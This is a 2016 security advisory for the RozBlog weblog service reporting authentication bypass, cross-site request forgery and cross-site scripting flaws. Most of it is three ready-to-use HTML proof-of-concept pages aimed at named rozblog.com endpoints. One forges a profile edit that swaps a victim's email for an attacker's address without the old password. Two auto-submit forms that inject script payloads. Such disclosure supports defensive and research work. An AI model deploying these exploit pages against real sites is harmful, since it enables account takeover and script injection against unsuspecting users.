Document Title:
===============
RozBlog Weblog Service - Authentication Bypass / Cross Site Request
Forgery / Cross Site Scripting


References (Source):
====================
http://ehsansec.ir/advisories/rozblog-xsrf-xss-bypass.txt


Release Date:
=============
2016-02-23


Product & Service Introduction:
===============================
Roseblog is one of the most famous blogging services, it has many
special features that indicate you an interesting experience of
blogging.


Vulnerability Type:
=========================
Authentication Bypass
Cross Site Request Forgery
Cross Site Scripting

Vulnerability Details:
==============================
I discovered an authentication bypass(change Email) vulnerability and
a client-side cross site request forgery web
vulnerability and a cross site scripting vulnerability and  in
RozBlog.com (Weblog Service).


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium




Proof of Concept (PoC):
=======================
-- Cross Site Request Forgery & Authentication Bypass --

-- PoC 1 --

-- To edit the e-mail users must first enter the old password on other
page, but with this exploit no longer requires it and bypass that. --

<html>
<head>
<title>Authentication Bypass - Csrf</title>
</head>
<body>
<form action="http://news.rozblog.com/Edit_Profile" method="post">
<input type="text" name="email" value="hacker@mail.com" >
<input type="text" name="name" value="Ehsan">
<input type="text" name="age" value="10">
<input type="text" name="site" value="http://ehsansec.ir/">
<input type="text" name="country" value="Country">
<input type="text" name="city" value="IRan">
<input type="text" name="about" value="About User">
<input type="text" name="yahoo" value="Yahoo Id">
<input type="text" name="password" value="123@abc">
<input type="submit" name="edit_profile" value="Attak">
</form>
</body>
</html>

-- PoC 2 --

<html>
<head>
<title>XSS - Csrf</title>
</head>
<body onload="document.contactfrm.submit()">
<form action="http://news.rozblog.com/Forum/Send/Message/"
name="contactfrm" method="post">
<input type="text" name="singer" value='"><img src=x onerror=alert(1)>'>
<input type="text" name="subject" value='"><img src=x onerror=alert(2)>'>
<input type="text" name="message" value='"></textarea><img src=x
onerror=alert(3)>'>
</form>
</body>
</html>

-- PoC 3 --

-- Cross Site Scripting --

-- For action attribute enter address of weblog or one of rozblog.com domains --

<html>
<head>
<title>Cross Site Scripting</title>
</head>
<body onload="document.info.submit()">
<form action='http://rozblog.com/View_Temp' method='POST'
name='info'>
<input name="c" id="c" value="2" type="hidden">
<input name='themecode' value="<script>alert('Ehsan')</script>">
</form>
</body>
</html>


Author:
==================
Ehsan Hosseini
http://ehsansec.ir/

SPX tnx to:
===========
Bl4ck_mohajem
Alireza


Contact:
========
hehsan979@gmail.com
info@ehsansec.ir